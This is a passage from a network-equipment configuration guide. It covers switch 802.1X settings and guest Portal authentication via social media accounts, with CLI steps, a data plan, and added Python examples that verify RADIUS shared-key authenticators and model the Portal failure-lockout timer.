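            inside = line.split()[-1] == str(acl_number)
            continue
        if line == "#":          # end of the ACL view in the configuration file
            inside = False
            continue
        m = _ACL_RULE.match(line) if inside else None
        if m:
            num, action, dst, wc = m.groups()
            net = wildcard_to_network(dst, wc) if dst else ANY
            rules.append((int(num), action, net))
    return sorted(rules, key=lambda r: r[0])


def parse_free_rules(config: str) -> List[ipaddress.IPv4Network]:
    """Destinations reachable before authentication (free-rule-template on this page)."""
    nets = []
    for raw in config.splitlines():
        m = _FREE_RULE.match(raw.strip())
        if m:
            addr, mask = m.groups()
            mask_arg = int(mask) if mask.isdigit() else mask
            nets.append(ipaddress.IPv4Network((addr, mask_arg), strict=False))
    return nets


def acl_permits(rules: List[AclRule], dst_ip: str) -> bool:
    """First matching rule decides; unmatched traffic is assumed permitted (see lead-in)."""
    ip = ipaddress.IPv4Address(dst_ip)
    for _, action, net in rules:
        if ip in net:
            return action == "permit"
    return True


def reachable(config: str, dst_ip: str, authenticated: bool,
              acl_number: int = 3002, server_ip: str = "192.168.30.1") -> bool:
    """Model of the verification step: free-rule destinations and the RADIUS server
    before authentication, the user ACL after authentication."""
    ip = ipaddress.IPv4Address(dst_ip)
    if not authenticated:
        if ip == ipaddress.IPv4Address(server_ip):
            return True
        return any(ip in net for net in parse_free_rules(config))
    return acl_permits(parse_acl(config, acl_number), dst_ip)
```

Feeding the same function the ACL from the Agile Controller's authorization result (the ACL number 3002 it delivers must name an ACL that exists on the switch) is a quick way to confirm that the post-authentication rights match the data plan before users go online.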

Switch Configuration File


#
sysname SwitchA
#
vlan batch 10 20
#
authentication-profile name p1
dot1x-access-profile d1
free-rule-template default_free_rule
access-domain huawei force
#
radius-server template rd1
radius-server shared-key cipher %^%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A](%^%#
radius-server authentication 192.168.30.1 1812 weight 80
radius-server accounting 192.168.30.1 1813 weight 80
#
acl number 3002
rule 1 permit ip destination 192.168.30.1 0
rule 2 permit ip destination 192.168.50.1 0
rule 3 deny ip
#

free-rule-template name default_free_rule
free-rule 10 destination ip 192.168.40.0 mask 255.255.255.0
#
aaa
authentication-scheme abc
authentication-mode radius
accounting-scheme acco1
accounting-mode radius
accounting realtime 15
domain huawei
authentication-scheme abc
accounting-scheme acco1
radius-server rd1
#
interface GigabitEthernet0/0/1
port link-type hybrid
port hybrid pvid vlan 10
port hybrid untagged vlan 10
authentication-profile p1
#
interface GigabitEthernet0/0/2
port link-type hybrid
port hybrid untagged vlan 20
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 10 20
#
interface LoopBack1
ip address 10.10.10.1 255.255.255.0
#
dot1x-access-profile name d1
#
return

10.6.5 Example for Configuring Guest Access Using Social Media Accounts (GooglePlus, Facebook, or Twitter Accounts) (V200R007C20, V200R009C00 and Later Versions)

Overview
An enterprise has deployed an authentication system to implement access control for all the
wireless users who attempt to connect to the enterprise network. Only authenticated users can
connect to the enterprise network. Enterprise employees connect to the network through PCs
and guests connect to the network through mobile phones. The administrator has created local
accounts for the employees so that they can use the local accounts to pass authentication. For
guest accounts, the administrator needs to configure the Service Manager to enable guests to
complete authentication using GooglePlus, Facebook or Twitter accounts.

Configuration Notes
l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller.
l Huawei's Agile Controller functions as the RADIUS server in this example. For the
Agile Controller, the minimum version required is V100R002C00SPC105.
l By default, the switch allows the packets sent to RADIUS and Portal servers to pass
through. You do not need to configure an authentication-free rule for the packets on the
switch.

l Service data forwarding modes are classified into tunnel forwarding mode and direct
forwarding mode. The tunnel forwarding mode is used in this example.
– In tunnel forwarding mode, the management VLAN and service VLAN cannot be
the same.
– In direct forwarding mode, do not configure the management VLAN and service
VLAN to be the same. You are advised to configure port isolation on the switch
interface directly connected to the AP. If port isolation is not configured, many
broadcast packets will be transmitted in VLANs or WLAN users on different APs
can directly communicate at Layer 2.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 10-26 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R009C00 | S12700 | V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R009C00 | S12700 | V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
V200R009C00 | S12700 | V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
In Figure 10-43, a switch functions as the AC and connects to the AP through a PoE switch.
The PoE switch provides power for the AP. You can configure WLAN services on the AC to
provide wireless access services for users.

Figure 10-43 Networking of a small-scale WLAN

[Figure: STAs associate with the AP; the AP connects to PoE SwitchA GE0/0/1 (VLAN100); SwitchA GE0/0/2 (VLAN100) connects to the AC GE1/0/1 (VLAN100); the AC, which also acts as DHCP server, connects through GE1/0/2 (VLAN101) to the Internet and through GE1/0/3 (VLAN102) to the Agile Controller (including Portal and RADIUS servers); the social media authentication server is reached over the Internet. Management VLAN: VLAN100. Service VLAN: VLAN101.]

Network Data Plan

Table 10-27 Network data plan

Item | Data | Description
AC | DHCP server address pool: 192.168.10.1-192.168.10.254/24 | IP address pool for APs.
AC | IP address of VLANIF 100: 192.168.10.1 | Gateway connected to the AP.
AC | DHCP server address pool: 192.168.20.1-192.168.20.254/24 | IP address pool for mobile phone users.
AC | IP address of VLANIF 101: 192.168.20.1 | Gateway for mobile phone users.
AC | IP address of VLANIF 102: 192.168.30.1 | Gateway connected to the Agile Controller.
AC | Portal server: IP address 192.168.30.2; port number that the switch uses to process Portal packets: 2000; destination port number in the packets that the switch sends to the Portal server: 50200; Portal shared key: Admin@123. RADIUS authentication server: IP address 192.168.30.2; port number: 1812; RADIUS shared key: Admin@123. RADIUS accounting server: IP address 192.168.30.2; port number: 1813; RADIUS shared key: Admin@123; accounting interval: 15 minutes. | The service controller (SC) of the Agile Controller integrates the RADIUS server and Portal server. Therefore, IP addresses of the authentication server, accounting server, and Portal server are the IP address of the Agile Controller. Configure a RADIUS accounting server to obtain user login and logout information. The port numbers of the authentication server and accounting server must be the same as the authentication and accounting port numbers of the RADIUS server.
Agile Controller | Domain name: access.example.com | Users can also use the domain name to access the Portal server.
Agile Controller | IP address: 192.168.30.2 | -
Agile Controller | Authentication port number: 1812 | -
Agile Controller | Accounting port number: 1813 | -
Agile Controller | RADIUS shared key: Admin@123 | It must be the same as that configured on the switch.
Agile Controller | Port number in the packets received by the Portal server: 50200 | -
Agile Controller | Portal shared key: Admin@123 | It must be the same as that configured on the switch.
AP group | Name: ap-group1; referenced profiles: VAP profile wlan-vap and regulatory domain profile domain1 | -
Regulatory domain profile | Name: domain1; country code: CN | -
SSID profile | Name: wlan-ssid; SSID name: wlan-net | -
Security profile | Name: wlan-security; security policy: open system authentication | -
VAP profile | Name: wlan-vap; forwarding mode: tunnel forwarding; service VLAN: VLAN 101; referenced profiles: SSID profile wlan-ssid, security profile wlan-security, and authentication profile p1 | -

Configuration Roadmap
1. Configure network connectivity.
2. Set the NAC mode of the AC to unified.
3. Configure parameters for the AC to communicate with the Agile Controller (RADIUS
server).
4. Configure Portal authentication.
5. Configure the AP to go online.
6. Configure STAs to go online.
7. Configure the Agile Controller and social media authentication server.

Procedure
Step 1 Configure network connectivity.
# On SwitchA, add GE0/0/1 connected to the AP and GE0/0/2 connected to the AC to
management VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100


[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# On the AC, add GE1/0/1 connected to SwitchA to VLAN 100, add GE1/0/3 connected to
the Agile Controller to VLAN 102, and add GE1/0/2 connected to the Internet to VLAN 101.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101 102
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/3] quit
[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/2] quit

# Configure the AC as a DHCP server based on interface address pools. VLANIF 100 assigns
IP addresses to the AP and VLANIF 101 assigns IP addresses to STAs.
[AC] dhcp enable //Enable DHCP.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an address pool on VLANIF 100 to assign IP
addresses to the AP.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.20.1 24
[AC-Vlanif101] dhcp select interface //Configure an address pool on VLANIF 101 to assign IP
addresses to STAs.
[AC-Vlanif101] quit

# Configure the IP address of VLANIF 102, which is the gateway of the Agile Controller.
[AC] interface vlanif 102
[AC-Vlanif102] ip address 192.168.30.1 24
[AC-Vlanif102] quit

Step 2 Set the NAC mode of the AC to unified.


[AC] authentication unified-mode //Set the NAC mode to unified. By default,
the switch works in unified mode. If the switch works in common mode, the
following information is displayed when this command is run to change the NAC
mode. The administrator must enter y. The switch will save the configuration and
restart immediately. Functions of the newly configured mode then take effect.
Warning: Switching the authentication mode will take effect after system restart
. Some configurations are invalid after the mode is switched. For the invalid co
mmands, see the user manual. Save the configuration file and reboot now? [Y/N]y

Step 3 Configure parameters for the AC to communicate with the Agile Controller (RADIUS server).
[AC] radius-server template policy //Create the RADIUS server template policy.
[AC-radius-policy] radius-server authentication 192.168.30.2 1812 source ip-
address 192.168.30.1 //Configure the IP address and port number of the RADIUS
authentication server.
[AC-radius-policy] radius-server accounting 192.168.30.2 1813 source ip-address
192.168.30.1 //Configure the IP address and port number of the RADIUS
accounting server.
[AC-radius-policy] radius-server shared-key cipher Admin@123 //Set the authentication key
and accounting key to Admin@123.
[AC-radius-policy] quit
[AC] aaa //Enter the AAA view.
[AC-aaa] authentication-scheme auth //Create the authentication scheme auth.
[AC-aaa-authen-auth] authentication-mode radius //Set the authentication mode
to RADIUS.
[AC-aaa-authen-auth] quit
[AC-aaa] accounting-scheme acco // Create the accounting scheme acco.
[AC-aaa-accounting-acco] accounting-mode radius //Set the accounting mode to
RADIUS.
[AC-aaa-accounting-acco] accounting realtime 15 //Set the real-time accounting
interval to 15 minutes.
[AC-aaa-accounting-acco] quit
[AC-aaa] domain portal //Create the domain portal.
[AC-aaa-domain-portal] authentication-scheme auth //Bind the authentication
scheme auth to the domain.
[AC-aaa-domain-portal] accounting-scheme acco //Bind the accounting scheme acco
to the domain.
[AC-aaa-domain-portal] radius-server policy //Bind the RADIUS server template
policy to the domain.
[AC-aaa-domain-portal] quit
[AC-aaa] quit
[AC] domain portal //Set the domain portal as the global default domain.
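The shared key configured in Step 3 (and the Portal key in Step 4) is what ties a reply to the device that sent the request: the RADIUS Response Authenticator is an MD5 digest over the packet and the key, and the User-Password attribute is masked with MD5 chains seeded by the key and the Request Authenticator. The following Python script is an added example for this page, not Huawei code and not part of the Agile Controller: it builds an Access-Request the way a NAS such as the AC would, lets a server answer it with the matching key and with a mismatched key, and performs the NAS-side verification that decides whether an Access-Accept is trusted. Only the key Admin@123 and the request/response roles come from the example; the user name, password, the fixed Request Authenticator, the Filter-Id attribute and the wrong key Admin@124 are constructed for the demonstration.

```python
import hashlib
import hmac
import struct

# Shared key from the example above. The user name, the password and the 16-byte
# Request Authenticator are constructed for this demonstration; a real NAS draws
# the Request Authenticator from a CSPRNG (os.urandom(16)) for every request.
RADIUS_SECRET = b"Admin@123"
ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_FILTER_ID = 1, 2, 11


def encode_user_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 section 5.2: pad to a multiple of 16 bytes, then XOR each block
    with MD5(secret + previous ciphertext block), seeded with the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ m for p, m in zip(padded[i:i + 16], mask))
        out += prev
    return out


def decode_user_password(encoded: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of encode_user_password, as performed by the RADIUS server."""
    out, prev = b"", request_auth
    for i in range(0, len(encoded), 16):
        mask = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ m for c, m in zip(encoded[i:i + 16], mask))
        prev = encoded[i:i + 16]
    return out.rstrip(b"\x00")


def attribute(attr_type: int, value: bytes) -> bytes:
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def parse_attributes(packet: bytes) -> dict:
    """Type-length-value walk over the attribute area; rejects truncated attributes."""
    attrs, pos = {}, 20
    while pos < len(packet):
        if pos + 2 > len(packet) or packet[pos + 1] < 2 or pos + packet[pos + 1] > len(packet):
            raise ValueError("malformed attribute")
        attrs[packet[pos]] = packet[pos + 2:pos + packet[pos + 1]]
        pos += packet[pos + 1]
    return attrs


def build_access_request(ident, username, password, secret, request_auth) -> bytes:
    attrs = attribute(ATTR_USER_NAME, username)
    attrs += attribute(ATTR_USER_PASSWORD, encode_user_password(password, secret, request_auth))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + request_auth + attrs


def response_authenticator(code, ident, attrs, request_auth, secret) -> bytes:
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_response(code, request, secret, attrs=b"") -> bytes:
    """Server side: the reply is bound to the request's authenticator and to the key."""
    ident, request_auth = request[1], request[4:20]
    auth = response_authenticator(code, ident, attrs, request_auth, secret)
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + auth + attrs


def verify_response(response, request, secret) -> bool:
    """NAS side. A reply that fails this check must be discarded: with the wrong
    key, an Access-Accept cannot be told apart from a forged one."""
    if len(response) < 20:
        return False
    code, ident, length = struct.unpack("!BBH", response[:4])
    if length != len(response) or ident != request[1]:
        return False
    expected = response_authenticator(code, ident, response[20:], request[4:20], secret)
    return hmac.compare_digest(response[4:20], expected)


def demo() -> dict:
    """Same request handled by a server with the matching key and by one with a
    different key; also a reply whose attributes were altered in transit."""
    request_auth = bytes(range(16))                       # constructed, see above
    req = build_access_request(7, b"guest", b"Passw0rd", RADIUS_SECRET, request_auth)
    encoded_pw = parse_attributes(req)[ATTR_USER_PASSWORD]
    # Filter-Id carrying a post-authentication ACL number is an illustrative attribute.
    accept = build_response(ACCESS_ACCEPT, req, RADIUS_SECRET, attribute(ATTR_FILTER_ID, b"3001"))
    tampered = accept[:-1] + bytes([accept[-1] ^ 0x01])   # "3001" becomes "3000" in flight
    wrong_key = b"Admin@124"
    accept_wrong = build_response(ACCESS_ACCEPT, req, wrong_key)
    return {
        "password_seen_by_server": decode_user_password(encoded_pw, RADIUS_SECRET, request_auth),
        "password_seen_with_wrong_key": decode_user_password(encoded_pw, wrong_key, request_auth),
        "accept_verifies": verify_response(accept, req, RADIUS_SECRET),
        "tampered_accept_verifies": verify_response(tampered, req, RADIUS_SECRET),
        "wrong_key_accept_verifies": verify_response(accept_wrong, req, RADIUS_SECRET),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Two things follow for the configuration above. A key mismatch does not produce an error message on the wire: the server simply recovers garbage from User-Password and rejects, or its replies fail verification on the AC, so "RADIUS server unreachable" symptoms should be checked against the shared key first. And because the protection is MD5 with a shared key rather than a modern MAC, keeping the RADIUS and Portal servers on their own VLAN 102 behind the AC, as this example does, is part of the design, not an optional tidy-up.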

Step 4 Configure Portal authentication.

# Configure parameters for the AC to communicate with the Agile Controller (Portal server).
[AC] web-auth-server portal_huawei //Configure the Portal server template
portal_huawei.
[AC-web-auth-server-portal_huawei] server-ip 192.168.30.2 //Configure the IP
address of the Portal server.
[AC-web-auth-server-portal_huawei] source-ip 192.168.30.1 //Configure the IP
address for the device to communicate with the Portal server.
[AC-web-auth-server-portal_huawei] port 50200 //Set the destination port number
in the packets sent by the AC to the Portal server to 50200, which is the same as
the port number in the packets received by the Portal server. The default port
number in the packets sent by the switch is 50100. You must manually change the
port number to 50200 for adaptation to the Portal server.
[AC-web-auth-server-portal_huawei] shared-key cipher Admin@123 //Configure the
shared key for communication with the Portal server. The shared key must be the
same as that configured on the Portal server.
[AC-web-auth-server-portal_huawei] url http://access.example.com:8080/portal //
Configure the URL of the Portal authentication page. access.example.com is the
host name of the Portal server. To make the authentication page push more secure and
faster, you are advised to use the domain name mode. In that case, the DNS server must
map the domain name access.example.com to the IP address of the Portal server
(192.168.30.2) in advance, and STAs must be able to reach that DNS server before they
are authenticated.
[AC-web-auth-server-portal_huawei] quit
[AC] web-auth-server listening-port 2000 //Configure the port number used to
process Portal packets on the device. The default port number is 2000. If this
port number is changed on the server, you must also change the port number on the
switch accordingly.
[AC] portal quiet-period //Enable the quiet function for Portal authentication.
If the number of times that an authentication user fails to be authenticated
within 60 seconds exceeds the configured value, the device discards packets from
the user for a period of time to prevent impact on the system caused by frequent
authentication failures.
[AC] portal quiet-times 5 //Configure the maximum number of authentication
failures within 60 seconds before the device quiets a Portal authentication user.
[AC] portal timer quiet-period 240 //Set the quiet period for Portal
authentication to 240 seconds.
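The three portal quiet-period commands above describe a counter and a timer: more than five failures in 60 seconds quiets a user for 240 seconds, during which the AC drops the user's Portal packets without processing them. The following Python model is an added example, not Huawei code, that replays constructed Portal authentication events through that logic so the effect of the thresholds can be seen, including the case a practitioner usually asks about: a correct login that arrives while the user is still quieted. Two details go beyond the text and are assumptions: the 60-second window is treated as sliding, and a successful authentication clears the failure counter. The log-line format is invented for the demonstration.

```python
import re
from collections import defaultdict, deque

FAILURE_WINDOW = 60  # seconds; the fixed window the quiet-period description above refers to


class PortalQuietTable:
    """Model of portal quiet-period, portal quiet-times and portal timer quiet-period.

    A user whose failures in the last FAILURE_WINDOW seconds exceed quiet_times is
    quieted for quiet_period seconds; while quieted, the device drops the user's
    Portal packets instead of processing them (even ones carrying valid credentials).
    """

    def __init__(self, quiet_times: int = 5, quiet_period: int = 240):
        self.quiet_times = quiet_times
        self.quiet_period = quiet_period
        self._failures = defaultdict(deque)   # user -> timestamps of recent failures
        self._quiet_until = {}                # user -> time at which the quiet period ends

    def is_quiet(self, user: str, now: float) -> bool:
        until = self._quiet_until.get(user)
        if until is None:
            return False
        if now >= until:                      # quiet period over: the user starts clean
            del self._quiet_until[user]
            return False
        return True

    def handle(self, user: str, now: float, success: bool) -> str:
        """Returns 'dropped', 'accepted', 'rejected' or 'quieted' for one attempt."""
        if self.is_quiet(user, now):
            return "dropped"
        if success:
            self._failures.pop(user, None)    # assumption: success clears the counter
            return "accepted"
        window = self._failures[user]
        window.append(now)
        while now - window[0] > FAILURE_WINDOW:   # sliding window (assumption)
            window.popleft()
        if len(window) > self.quiet_times:
            self._quiet_until[user] = now + self.quiet_period
            del self._failures[user]
            return "quieted"
        return "rejected"


# Log-line format constructed for this demonstration; it is not a Huawei log format.
LOG_LINE = re.compile(r"t=(?P<t>\d+)\s+sta=(?P<sta>[0-9a-f-]+)\s+portal-auth=(?P<result>ok|fail)")


def replay(log_lines, quiet_times: int = 5, quiet_period: int = 240) -> list:
    """Feeds the lines through one table; returns (t, sta, action) for each parsed line."""
    table = PortalQuietTable(quiet_times, quiet_period)
    results = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        t, sta = int(m["t"]), m["sta"]
        results.append((t, sta, table.handle(sta, t, m["result"] == "ok")))
    return results


# Constructed sample: one STA fails six times within 30 s, retries with the right
# credentials inside the quiet period, and succeeds once the 240 s have elapsed.
SAMPLE_LOG = [
    "t=0   sta=e019-1dc7-1e08 portal-auth=fail",
    "t=5   sta=e019-1dc7-1e08 portal-auth=fail",
    "t=10  sta=e019-1dc7-1e08 portal-auth=fail",
    "t=15  sta=e019-1dc7-1e08 portal-auth=fail",
    "t=20  sta=e019-1dc7-1e08 portal-auth=fail",
    "t=30  sta=e019-1dc7-1e08 portal-auth=fail",  # 6th failure in 60 s: quiet until t=270
    "t=60  sta=e019-1dc7-1e08 portal-auth=ok",    # valid credentials, still dropped
    "t=90  sta=0a1b-2c3d-4e5f portal-auth=ok",    # another STA is not affected
    "t=270 sta=e019-1dc7-1e08 portal-auth=ok",    # quiet period over
]

if __name__ == "__main__":
    for t, sta, action in replay(SAMPLE_LOG):
        print(f"t={t:<4} {sta} {action}")
```

The quiet state is keyed per user, so one misbehaving guest device does not affect the others; the price is that a user who mistypes a social media password a few times is locked out for four minutes even after entering it correctly, which is worth stating on the guest portal page.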

# Configure a Portal access profile.


[AC] portal-access-profile name web1
[AC-portal-acces-profile-web1] web-auth-server portal_huawei direct
[AC-portal-acces-profile-web1] quit


# Configure the AC to allow users to access resources of the social media authentication
server before authentication.
[AC] acl 6000
[AC-acl-ucl-6000] rule 1 permit ip destination fqdn www.googleapis.com //
Configure the switch to allow packets sent to the Google server to pass through
before authentication.
[AC-acl-ucl-6000] rule 2 permit ip destination fqdn apis.google.com //Configure
the switch to allow packets sent to the Google server to pass through before
authentication.
[AC-acl-ucl-6000] rule 3 permit ip destination fqdn connect.facebook.net //
Configure the switch to allow packets sent to the Facebook server to pass through
before authentication.
[AC-acl-ucl-6000] rule 4 permit ip destination fqdn api.twitter.com //Configure
the switch to allow packets sent to the Twitter server to pass through before
authentication.
[AC-acl-ucl-6000] rule 5 permit ip destination fqdn abs.twimg.com //Configure
the switch to allow packets sent to the Twitter server to pass through before
authentication.
[AC-acl-ucl-6000] rule 6 permit ip destination fqdn mobile.twitter.com //
Configure the switch to allow packets sent to the Twitter server to pass through
before authentication.
[AC-acl-ucl-6000] rule 7 permit ip destination fqdn twitter.com //Configure the
switch to allow packets sent to the Twitter server to pass through before
authentication.

# Configure an authentication-free rule profile.


[AC] free-rule-template name default_free_rule
[AC-free-rule-default_free_rule] free-rule acl 6000 //Bind ACL 6000 to the
authentication-free rule profile.
[AC-free-rule-default_free_rule] quit

# Configure an authentication profile.


[AC] authentication-profile name p1
[AC-authen-profile-p1] portal-access-profile web1 //Bind the Portal access
profile web1.
[AC-authen-profile-p1] free-rule-template default_free_rule //Bind an
authentication-free rule profile.
[AC-authen-profile-p1] quit

# Configure network access rights for users in the post-authentication domain. ACL 3001 is
only defined on the AC here; nothing in this example binds it to an interface or profile. It
takes effect when the Agile Controller delivers it as the authorization result after a user
passes Portal authentication (see Step 7). ACL 6000 above is the only ACL the AC applies on
its own, and it applies before authentication.
[AC] acl 3001 //Configure the post-authentication domain for mobile terminals.
[AC-acl-adv-3001] rule 1 permit ip //Allow authenticated users to access all
network resources.
[AC-acl-adv-3001] quit

# Enable Portal authentication.


[AC] interface vlanif 101
[AC-Vlanif101] authentication-profile p1 //Enable Portal authentication on the
interface to which mobile terminals connect.
[AC-Vlanif101] quit

Step 5 Configure the AP to go online.


# Create an AP group to which the APs with the same configuration can be added.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn


[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain
configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100

# Import the AP offline on the AC and add the AP to the AP group ap-group1. In this
example, the AP's MAC address is 60de-4476-e360. Configure a name for the AP based on
the AP's deployment location, so that you can know where the AP is located. For example, if
the AP with MAC address 60de-4476-e360 is deployed in area 1, name the AP area_1.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained,
you do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1. Radio 0 of the
AP6010DN-AGN works on the 2.4 GHz frequency band and radio 1 works on the 5 GHz frequency
band.

[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configurations of the radio, Whether to
continue? [Y/N]:y
[AC-wlan-ap-0] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field displays nor, the AP has gone online.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [1]
-------------------------------------------------------------------------------------
ID MAC            Name   Group     IP            Type         State STA Uptime
-------------------------------------------------------------------------------------
0  60de-4476-e360 area_1 ap-group1 10.23.100.254 AP6010DN-AGN nor   0   10S
-------------------------------------------------------------------------------------
Total: 1

Step 6 Configure STAs to go online.

# Create the security profile wlan-security and set the security policy to open system
authentication. Open system authentication applies no 802.11 encryption: Portal
authentication decides who may pass the AC, but frames between the STA and the AP are sent
in the clear, which is the usual trade-off for a guest SSID.
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security open //Set the security policy to
open.
[AC-wlan-sec-prof-wlan-security] quit

# Create the SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID name to wlan-net.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create the VAP profile wlan-vap, configure the service data forwarding mode and service
VLANs, and apply the security profile, SSID profile, and authentication profile to the VAP
profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel //Set the service forwarding
mode to tunnel forwarding.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //By default, the VLAN ID
is 1. Set the VLAN ID to 101.
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] authentication-profile p1
[AC-wlan-vap-prof-wlan-vap] quit

# Bind the VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1
of the AP.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

# Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 7 Configure the Agile Controller and social media authentication server. For details, see Agile
Controller-Campus Product Documentation - Example for Configuring Guest Access
Using Social Media Accounts (GooglePlus, Facebook, or Twitter Accounts).
Step 8 Verify the configuration.
After completing the configuration, run the display vap ssid wlan-net command. If the
